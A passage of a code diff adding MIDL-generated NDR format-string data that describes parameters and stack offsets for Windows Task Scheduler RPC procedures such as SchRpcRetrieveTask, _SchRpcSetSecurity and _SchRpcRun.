+			0xa,		/* 10 */
+/* 62 */	0xa,		/* 10 */
+			0x5,		/* Ext Flags:  new corr desc, srv corr check, */
+/* 64 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 66 */	NdrFcShort( 0x1 ),	/* 1 */
+/* 68 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 70 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 72 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
+/* 74 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 76 */	NdrFcShort( 0x6 ),	/* Type Offset=6 */
+
+	/* Parameter arg_1 */
+
+/* 78 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 80 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 82 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_2 */
+
+/* 84 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 86 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 88 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 90 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
+/* 92 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 94 */	NdrFcShort( 0x6 ),	/* Type Offset=6 */
+
+	/* Parameter arg_4 */
+
+/* 96 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 98 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 100 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_5 */
+
+/* 102 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 104 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 106 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_6 */
+
+/* 108 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
+/* 110 */	NdrFcShort( 0x38 ),	/* X64 Stack size/offset = 56 */
+/* 112 */	NdrFcShort( 0xe ),	/* Type Offset=14 */
+
+	/* Parameter arg_7 */
+
+/* 114 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 116 */	NdrFcShort( 0x40 ),	/* X64 Stack size/offset = 64 */
+/* 118 */	NdrFcShort( 0x3e ),	/* Type Offset=62 */
+
+	/* Parameter arg_8 */
+
+/* 120 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 122 */	NdrFcShort( 0x48 ),	/* X64 Stack size/offset = 72 */
+/* 124 */	NdrFcShort( 0x42 ),	/* Type Offset=66 */
+
+	/* Parameter arg_9 */
+
+/* 126 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 128 */	NdrFcShort( 0x50 ),	/* X64 Stack size/offset = 80 */
+/* 130 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure SchRpcRetrieveTask */
+
+
+	/* Return value */
+
+/* 132 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 134 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 138 */	NdrFcShort( 0x2 ),	/* 2 */
+/* 140 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 142 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 144 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 146 */	NdrFcShort( 0x1c ),	/* 28 */
+/* 148 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 150 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
+			0x5,		/* 5 */
+/* 152 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 154 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 156 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 158 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 160 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 162 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 164 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 166 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 168 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 170 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 172 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_2 */
+
+/* 174 */	NdrFcShort( 0x148 ),	/* Flags:  in, base type, simple ref, */
+/* 176 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 178 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 180 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 182 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 184 */	NdrFcShort( 0x3e ),	/* Type Offset=62 */
+
+	/* Parameter arg_4 */
+
+/* 186 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 188 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 190 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcCreateFolder */
+
+
+	/* Return value */
+
+/* 192 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 194 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 198 */	NdrFcShort( 0x3 ),	/* 3 */
+/* 200 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 202 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 204 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 206 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 208 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 210 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x4,		/* 4 */
+/* 212 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 214 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 216 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 218 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 220 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 222 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 224 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 226 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 228 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
+/* 230 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 232 */	NdrFcShort( 0x6 ),	/* Type Offset=6 */
+
+	/* Parameter arg_2 */
+
+/* 234 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 236 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 238 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 240 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 242 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 244 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcSetSecurity */
+
+
+	/* Return value */
+
+/* 246 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 248 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 252 */	NdrFcShort( 0x4 ),	/* 4 */
+/* 254 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 256 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 258 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 260 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 262 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 264 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x4,		/* 4 */
+/* 266 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 268 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 270 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 272 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 274 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 276 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 278 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 280 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 282 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 284 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 286 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_2 */
+
+/* 288 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 290 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 292 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 294 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 296 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 298 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcGetSecurity */
+
+
+	/* Return value */
+
+/* 300 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 302 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 306 */	NdrFcShort( 0x5 ),	/* 5 */
+/* 308 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 310 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 312 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 314 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 316 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 318 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
+			0x4,		/* 4 */
+/* 320 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 322 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 324 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 326 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 328 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 330 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 332 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 334 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 336 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 338 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 340 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 342 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 344 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 346 */	NdrFcShort( 0x3e ),	/* Type Offset=62 */
+
+	/* Parameter arg_3 */
+
+/* 348 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 350 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 352 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcEnumFolders */
+
+
+	/* Return value */
+
+/* 354 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 356 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 360 */	NdrFcShort( 0x6 ),	/* 6 */
+/* 362 */	NdrFcShort( 0x40 ),	/* X64 Stack size/offset = 64 */
+/* 364 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 366 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 368 */	NdrFcShort( 0x2c ),	/* 44 */
+/* 370 */	NdrFcShort( 0x40 ),	/* 64 */
+/* 372 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
+			0x7,		/* 7 */
+/* 374 */	0xa,		/* 10 */
+			0x3,		/* Ext Flags:  new corr desc, clt corr check, */
+/* 376 */	NdrFcShort( 0x1 ),	/* 1 */
+/* 378 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 380 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 382 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 384 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 386 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 388 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 390 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 392 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 394 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 396 */	NdrFcShort( 0x158 ),	/* Flags:  in, out, base type, simple ref, */
+/* 398 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 400 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 402 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 404 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 406 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_4 */
+
+/* 408 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 410 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 412 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_5 */
+
+/* 414 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 416 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 418 */	NdrFcShort( 0x64 ),	/* Type Offset=100 */
+
+	/* Parameter arg_6 */
+
+/* 420 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 422 */	NdrFcShort( 0x38 ),	/* X64 Stack size/offset = 56 */
+/* 424 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcEnumTasks */
+
+
+	/* Return value */
+
+/* 426 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 428 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 432 */	NdrFcShort( 0x7 ),	/* 7 */
+/* 434 */	NdrFcShort( 0x40 ),	/* X64 Stack size/offset = 64 */
+/* 436 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 438 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 440 */	NdrFcShort( 0x2c ),	/* 44 */
+/* 442 */	NdrFcShort( 0x40 ),	/* 64 */
+/* 444 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
+			0x7,		/* 7 */
+/* 446 */	0xa,		/* 10 */
+			0x3,		/* Ext Flags:  new corr desc, clt corr check, */
+/* 448 */	NdrFcShort( 0x1 ),	/* 1 */
+/* 450 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 452 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 454 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 456 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 458 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 460 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 462 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 464 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 466 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 468 */	NdrFcShort( 0x158 ),	/* Flags:  in, out, base type, simple ref, */
+/* 470 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 472 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 474 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 476 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 478 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_4 */
+
+/* 480 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 482 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 484 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_5 */
+
+/* 486 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 488 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 490 */	NdrFcShort( 0x64 ),	/* Type Offset=100 */
+
+	/* Parameter arg_6 */
+
+/* 492 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 494 */	NdrFcShort( 0x38 ),	/* X64 Stack size/offset = 56 */
+/* 496 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcEnumInstances */
+
+
+	/* Return value */
+
+/* 498 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 500 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 504 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 506 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 508 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 510 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 512 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 514 */	NdrFcShort( 0x24 ),	/* 36 */
+/* 516 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
+			0x5,		/* 5 */
+/* 518 */	0xa,		/* 10 */
+			0x3,		/* Ext Flags:  new corr desc, clt corr check, */
+/* 520 */	NdrFcShort( 0x1 ),	/* 1 */
+/* 522 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 524 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 526 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 528 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
+/* 530 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 532 */	NdrFcShort( 0x6 ),	/* Type Offset=6 */
+
+	/* Parameter arg_1 */
+
+/* 534 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 536 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 538 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 540 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 542 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 544 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 546 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 548 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 550 */	NdrFcShort( 0x82 ),	/* Type Offset=130 */
+
+	/* Parameter arg_4 */
+
+/* 552 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 554 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 556 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcGetInstanceInfo */
+
+
+	/* Return value */
+
+/* 558 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 560 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 564 */	NdrFcShort( 0x9 ),	/* 9 */
+/* 566 */	NdrFcShort( 0x50 ),	/* X64 Stack size/offset = 80 */
+/* 568 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 570 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 572 */	NdrFcShort( 0x44 ),	/* 68 */
+/* 574 */	NdrFcShort( 0x5c ),	/* 92 */
+/* 576 */	0x45,		/* Oi2 Flags:  srv must size, has return, has ext, */
+			0x9,		/* 9 */
+/* 578 */	0xa,		/* 10 */
+			0x3,		/* Ext Flags:  new corr desc, clt corr check, */
+/* 580 */	NdrFcShort( 0x1 ),	/* 1 */
+/* 582 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 584 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 586 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 588 */	NdrFcShort( 0x10a ),	/* Flags:  must free, in, simple ref, */
+/* 590 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 592 */	NdrFcShort( 0x90 ),	/* Type Offset=144 */
+
+	/* Parameter arg_1 */
+
+/* 594 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 596 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 598 */	NdrFcShort( 0x3e ),	/* Type Offset=62 */
+
+	/* Parameter arg_2 */
+
+/* 600 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 602 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 604 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 606 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 608 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 610 */	NdrFcShort( 0x3e ),	/* Type Offset=62 */
+
+	/* Parameter arg_4 */
+
+/* 612 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 614 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 616 */	NdrFcShort( 0x3e ),	/* Type Offset=62 */
+
+	/* Parameter arg_5 */
+
+/* 618 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 620 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 622 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_6 */
+
+/* 624 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 626 */	NdrFcShort( 0x38 ),	/* X64 Stack size/offset = 56 */
+/* 628 */	NdrFcShort( 0xb6 ),	/* Type Offset=182 */
+
+	/* Parameter arg_7 */
+
+/* 630 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 632 */	NdrFcShort( 0x40 ),	/* X64 Stack size/offset = 64 */
+/* 634 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_8 */
+
+/* 636 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 638 */	NdrFcShort( 0x48 ),	/* X64 Stack size/offset = 72 */
+/* 640 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcStopInstance */
+
+
+	/* Return value */
+
+/* 642 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 644 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 648 */	NdrFcShort( 0xa ),	/* 10 */
+/* 650 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 652 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 654 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 656 */	NdrFcShort( 0x4c ),	/* 76 */
+/* 658 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 660 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x3,		/* 3 */
+/* 662 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 664 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 666 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 668 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 670 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 672 */	NdrFcShort( 0x10a ),	/* Flags:  must free, in, simple ref, */
+/* 674 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 676 */	NdrFcShort( 0x90 ),	/* Type Offset=144 */
+
+	/* Parameter arg_1 */
+
+/* 678 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 680 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 682 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 684 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 686 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 688 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcStop */
+
+
+	/* Return value */
+
+/* 690 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 692 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 696 */	NdrFcShort( 0xb ),	/* 11 */
+/* 698 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 700 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 702 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 704 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 706 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 708 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x3,		/* 3 */
+/* 710 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 712 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 714 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 716 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 718 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 720 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
+/* 722 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 724 */	NdrFcShort( 0x6 ),	/* Type Offset=6 */
+
+	/* Parameter arg_1 */
+
+/* 726 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 728 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 730 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 732 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 734 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 736 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcRun */
+
+
+	/* Return value */
+
+/* 738 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 740 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 744 */	NdrFcShort( 0xc ),	/* 12 */
+/* 746 */	NdrFcShort( 0x48 ),	/* X64 Stack size/offset = 72 */
+/* 748 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 750 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 752 */	NdrFcShort( 0x18 ),	/* 24 */
+/* 754 */	NdrFcShort( 0x4c ),	/* 76 */
+/* 756 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x8,		/* 8 */
+/* 758 */	0xa,		/* 10 */
+			0x5,		/* Ext Flags:  new corr desc, srv corr check, */
+/* 760 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 762 */	NdrFcShort( 0x1 ),	/* 1 */
+/* 764 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 766 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
